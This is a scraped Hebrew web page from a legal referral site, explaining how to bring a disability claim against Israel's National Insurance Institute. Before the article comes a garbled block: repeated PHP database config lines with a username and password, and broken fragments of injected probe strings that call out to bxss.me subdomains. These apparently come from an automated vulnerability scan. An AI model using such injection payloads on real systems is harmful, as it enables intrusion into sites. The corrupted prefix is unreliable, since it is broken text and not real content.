$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_u $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ?>; $db_name = "1"; ?>b_name = "1"; ?>esb9769.bxss.me.')[3].to_s)+'"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>_pass = "g00dPa$$w0rD"; $db_name = "1"; ?>; ?>'hiteptjlxcjea2c2f9.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> הגשת תביעה נגד ביטוח לאומי - עורך דין פרובונו לשירותך!
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
יצירת קשר
חיפוש באתר
מאמרים אחרונים

הכל על הגשת תביעה נגד המוסד לביטוח לאומי

תאריך: 28/03/2011 14:32   מחבר: מערכת פרובונו

המוסד לביטוח לאומי הוא הגוף האחראי על מימוש תנאי הרווחה במדינת ישראל.

אדם אשר נולד עם ליקוי גופני או שנגרמה לו פגיעה גופנית זכאי לפנות למוסד לביטוח לאומי בבקשה שיכיר בפגיעה ויקבע את שיעור נכותו בהתאם.

ועדה רפואית מטעם המוסד לביטוח לאומי

ביטוח לאומי יזמן את התובע להתייצב בפני ועדה רפואית אשר תקבע את שיעור הנכות של התובע ותכריע האם מדובר בנכות קבועה או בנכות זמנית.

גובה הפיצויים משתנה בהתאם לשיעורי הנכות השונים:

•    במקרה של נכות קבועה אך בשיעור שהוא פחות מ 5% - המוסד לביטוח לאומי אינו מעניק פיצוי לתובע.

•    במקרה של נכות בשיעור הנע בין 5% ל 19% - ניתן לקבל מענק נכות מהמוסד לביטוח לאומי באופן חד פעמי.

•    כאשר שיעור הנכות עולה על 20% - ישלם המוסד לביטוח לאומי פעם בחודש קצבת נכות, עד שהמבוטח יגיע לגיל פרישה או עד ליום מותו.

הוועדה הרפואית קובעת את אחוזי הנכות על בסיס מסמכים רפואיים שהובאו בפניה ולעיתים גם על סמך בדיקה גופנית של התובע.

כאישור הסכמה נדרש התובע לחתום שהוא עומד לבדיקה בפני הועדה וכן נדרשת חתימתו לאחר ביצוע הבדיקה לאישור פרוטוקול דיוני הועדה.

מסיבה זו מומלץ לתובע לוודא שכל תלונותיו נרשמו כהלכה ולדרוש תיקון של מידע שגוי או מידע שהושמט מרישומי הועדה.

על קביעה של הועדה הרפואית מטעם המוסד לביטוח לאומי ניתן לערער פעם אחת במסגרת ועדת ערר.

חשוב להדגיש, כי ערעור על החלטת הועדה אפשרי רק במידה ונפל ליקוי בירוקרטי במסגרת ההליך ולא ניתן לערער על קביעות רפואיות של הועדה.

הועדה הרפואית רשאית לקיים דיון נוסף בסוגית הפיצויים והנכות, ובמקרה כזה קיים סיכון שבדיון הנוסף יוחלט לשלול את הפיצויים שנפסקו לנפגע במסגרת הועדה המקורית.

טיפים למי שעומד בפני ועדה רפואית מטעם המוסד לביטוח לאומי

ראשית, כדאי לוודא שהגעתם מצויידים בכל המסמכים הרפואיים הנדרשים.

בנוסף, כיוון שזמן הבדיקה על ידי הועדה הינו קצוב, חשוב שתובע אשר מתייצב מולה יקפיד על הצגת הדברים באופן שוטף, מובן וברור.

לצורך כך, ניתן להתכונן מראש על ידי הכנה של תקציר אשר מתאר את הקשיים התפקודיים כתוצאה מהפגיעה, הטיפולים הרפואיים שנדרשתם לעבור ועוד, בכדי לרכז את מכלול ההיבטים אותם התכוונתם להעלות בפני הועדה.

במועד ההתייצבות בפני הועדה חשוב להציג את הדברים בצורה מנומסת ואדיבה ולגבות את התלונות שלכם במסמכים הרפואיים הנדרשים.

על חשיבות קבלת יעוץ משפטי בהגשת תביעה נגד ביטוח לאומי

תביעה נגד המוסד לביטוח לאומי היא אינה תביעה פשוטה וזאת נוכח העובדה שכל טעות עשויה לגרום לשלילת זכאותו של הנפגע לקבלת פיצויים גם במידה והוא אכן זכאי לכך.

מסיבה זו, מומלץ להסתייע בשירות המשפטי שמציעים עורכי דין המתמחים בביטוח לאומי או בדיני נזיקין ואנו נשמח להפנות אתכם אל עורכי דין העוסקים בהגשת תביעות מסוג זה, אשר ילוו אתכם לאורך כל השלבים הנדרשים.


לחצו כאן לקבלת יעוץ משפטי חינם על ידי מילוי פרטיכם בטופס יצירת קשר באתר!


ליחצו כאן להוספת תגובה
סגורסגור